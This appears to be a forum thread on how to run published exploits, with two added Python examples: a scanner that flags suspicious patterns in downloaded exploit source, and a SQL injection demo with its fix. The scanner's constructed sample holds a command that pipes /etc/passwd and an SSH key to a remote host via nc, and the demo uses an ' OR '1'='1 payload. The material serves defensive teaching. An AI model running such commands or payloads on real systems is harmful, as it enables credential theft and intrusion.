
after checking securityfocus for vulnerability...

After I scan a host and go to securityfocus and identify a given vulnerability, how do I use the exploit? They come in the form of .pl (Perl), .c (C) and even .exe. How do you run these exploits against the target machine?

I do not think that we are in the business of giving coaching sessions on how to run exploits against vulnerabilities.

Please bear in mind that this is a public forum and that anybody and their cat can read it. This includes every script kiddie in cyberspace.

If anyone wishes to respond, please use the PM system and keep it private.

My personal view is that if someone doesn't know how to run an exploit against a target; they are trying to run before they have learned how to walk.

Last edited by nihil; September 13th, 2007 at 12:55 PM.

If you cannot do someone any good: don't do them any harm....
As long as you did this to one of these, the least of my little ones............you did it unto Me.
What profiteth a man if he gains the entire World at the expense of his immortal soul?

If it is a C exploit then you need to compile it - depending on your Operating System this is done in different ways. Linux has the GCC app that comes natively with most installations. With Windows you will have to download one of your choice (googling for 'free windows C compilers' gives you a huge list).

Perl, Python etc. all need the respective libraries installed - going to the relevant home page for the language will invariably lead to a downloads section with the relevant libraries for your operating system.

Usually the exploit will have a small paragraph at the top explaining what it does and how to use it - if it doesn't, reading the source code will give you more of a hint of what information is needed (you don't need to understand the source code to read it - just look out for things like 'enter the remote IP' etc.).

Failing that, run the exploit (usually from the command line) and it will ask you to enter the relevant details, which are usually the remote IP address, remote port and the local IP and port (if a reverse shell is to be created); other exploits such as those against web servers may ask for directories etc.

Be careful however, as there are quite a few malicious exploits out there that have been posted in the hope that the casual skiddie will download and run them without actually understanding what they are doing; these do not actually exploit a remote system and will in fact exploit your system.

It always pays to read through the source code - even if you know nothing about the language you will be able to spot references to your own system....
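The advice above, to read the source for references to your own system before compiling or running it, can be partly mechanised. The following Python helper is an added example and is not code from anyone in this thread; its pattern list is a heuristic of this example's own choosing (hard-coded addresses, shell execution, destructive commands, local credential files, outbound transfer tools, long encoded blobs), and the sample "proof of concept" it scans is constructed for the demonstration, using a documentation address (203.0.113.7) rather than a real host. A hit means "read this line carefully", not "this file is malicious": a usage banner that mentions an IP is harmless, while a `system()` call that pipes your own files to an address you did not supply is exactly the case the poster warns about.

```python
import re
from typing import Dict, List

# Heuristic patterns worth a second look before compiling or running code
# from an untrusted source. The list is this example's own choice, not a
# complete or authoritative set; a match means "read this line", not "malicious".
SUSPICIOUS_PATTERNS = {
    # the target should come from the command line, not be baked into the file
    "hardcoded_ip": r"\b(?:\d{1,3}\.){3}\d{1,3}\b",
    # the proof of concept should not need to spawn a local shell at all
    "shell_exec": r"\b(?:system|popen|exec[lv]?p?e?|ShellExecute|WinExec)\s*\(",
    # rm with -r/-f, del /s or /q, format <drive>:
    "destructive_cmd": r"\brm\s+-[a-zA-Z]*[rf][a-zA-Z]*\b|\bdel\s+/[sq]\b|\bformat\s+[a-z]:",
    # files on *your* machine that a remote exploit has no business reading
    "local_secrets": r"/etc/(?:passwd|shadow)\b|\.ssh/|\.bash_history\b",
    # tools typically used to fetch a second stage or send data out
    "outbound_tool": r"\b(?:wget|curl|nc|netcat|tftp)\b",
    # a long base64-looking run is a common way to hide a second payload
    "encoded_blob": r"[A-Za-z0-9+/]{60,}={0,2}",
}


def review_source(src: str) -> Dict[str, List[int]]:
    """Return {pattern_name: [line numbers]} for every line matching a pattern."""
    findings: Dict[str, List[int]] = {}
    for lineno, line in enumerate(src.splitlines(), start=1):
        for name, pattern in SUSPICIOUS_PATTERNS.items():
            if re.search(pattern, line):
                findings.setdefault(name, []).append(lineno)
    return findings


def summarize(src: str) -> str:
    """Human-readable report: each flagged line with the categories it tripped."""
    by_line: Dict[int, List[str]] = {}
    for name, lines in review_source(src).items():
        for n in lines:
            by_line.setdefault(n, []).append(name)
    src_lines = src.splitlines()
    report = []
    for n in sorted(by_line):
        report.append(f"line {n}: {', '.join(sorted(by_line[n]))}\n"
                      f"    {src_lines[n - 1].strip()}")
    return "\n".join(report) if report else "no suspicious references found"


# Constructed sample: a "proof of concept" whose "cleanup" line reads local
# files and sends them to an address that is not the target the user supplies.
# 203.0.113.7 is a documentation address; nothing here is a working exploit.
SAMPLE_SOURCE = "\n".join([
    "/* fooserver 1.2 remote overflow, usage: ./poc <target ip> <port> */",
    "#include <stdio.h>",
    "#include <stdlib.h>",
    "int main(int argc, char **argv) {",
    '    /* "clean up temporary files" */',
    '    system("cat /etc/passwd ~/.ssh/id_rsa | nc 203.0.113.7 4444");',
    '    printf("[*] sending payload to %s\\n", argv[1]);',
    "    return 0;",
    "}",
])

if __name__ == "__main__":
    print(summarize(SAMPLE_SOURCE))
```

Run it against any downloaded source (`summarize(open(path).read())`) and then read the flagged lines in context; the real check is still a human reading the code, as the post says, and a clean report only means none of these particular patterns appeared.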

Be careful however, as there are quite a few malicious exploits out there that have been posted in the hope that the casual skiddie will download and run them without actually understanding what they are doing; these do not actually exploit a remote system and will in fact exploit your system.

That is very true!

Also, you may be required to understand the operating system and application/service that you are trying to exploit, as well as the nature of the exploit.

IMO those "this is for educational and research purposes" disclaimers would not stand up in many courts.

Because of this, the author may well have posted a slightly incomplete or "neutered" version that will not work "out of the box".

That way they ensure that only people who know what they are doing can make it work, and that anyone who does so takes at least the major part, if not all of the responsibility for the consequences.

It is a much stronger defence to be able to say that what you published could not be used for malicious purposes as it stands.


Well, I'm doing it for learning purposes, against my vmware machines. I guess that once you find an exploit in the security focus website and it generates the code for you, you just copy and paste it into your metasploit directory and run it against your target machine, and of course in case of the .c file you'll have to compile it first.
Also I notice that most of the exploits in the /pentest/framework3 or 2 have the .rb extension, which I'm assuming is for Ruby. Once I have selected a source code for a new exploit and compiled it, should I drop it in the framework3 directory? And where, because in that directory there are two folders that seem to have exploits in them, the /exploits and the /modules directory; they both contain .rb files, or does it not matter? Any input appreciated.

Metasploit is a framework. It has nothing to do with the exploits posted at sec.focus. The exploits found at sec.focus aren't "generated", they are posted by the user community and they may or may not use the metasploit framework. Most of them are basically used "stand-alone".

If you don't know what to do with it then you need to read up. As Nihil said, you're trying to run before you can walk.

Start by reading up on the various ways to exploit bugs, things like buffer overflows, format string exploits, SQL/command injections etc. Once you know how the basics work you can move on to the more or less "real world" scenario you're trying now.

Oliver's Law:
Experience is something you don't get until just after you need it.
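The post above recommends learning how the basic bug classes work before touching a published exploit. For one of the classes it names, SQL injection, the following Python example shows the mechanism in the smallest form that actually runs: a lookup that pastes user input into the statement text next to the same lookup done with a bound parameter. This is an added example, not code from the thread or from any project mentioned in it; the in-memory SQLite table, its two rows and the `' OR '1'='1` input are all constructed for the demonstration.

```python
import sqlite3
from typing import List, Tuple


def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for an application's user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> List[Tuple[str, str]]:
    # The bug: the input becomes part of the statement text, so a quote
    # character in 'name' ends the literal and the rest is parsed as SQL.
    query = "SELECT name, role FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()


def lookup_fixed(conn: sqlite3.Connection, name: str) -> List[Tuple[str, str]]:
    # The fix: the statement is constant and the value is bound separately,
    # so the database never parses the input as SQL, whatever it contains.
    return conn.execute(
        "SELECT name, role FROM users WHERE name = ?", (name,)
    ).fetchall()


# Constructed input: closes the open quote and appends an always-true condition,
# turning "WHERE name = '...'" into "WHERE name = '' OR '1'='1'".
INJECTION_INPUT = "' OR '1'='1"

if __name__ == "__main__":
    db = make_demo_db()
    print("normal lookup:     ", lookup_fixed(db, "alice"))
    print("vulnerable + input:", lookup_vulnerable(db, INJECTION_INPUT))  # every row
    print("fixed + input:     ", lookup_fixed(db, INJECTION_INPUT))       # no rows
```

The same shape (data concatenated into something that is later parsed as code) is what the other classes in the list share: a format string built from input is parsed by `printf`, a shell command built from input is parsed by the shell, and the fix is always the same idea of keeping the code fixed and passing the data through a channel that is never parsed.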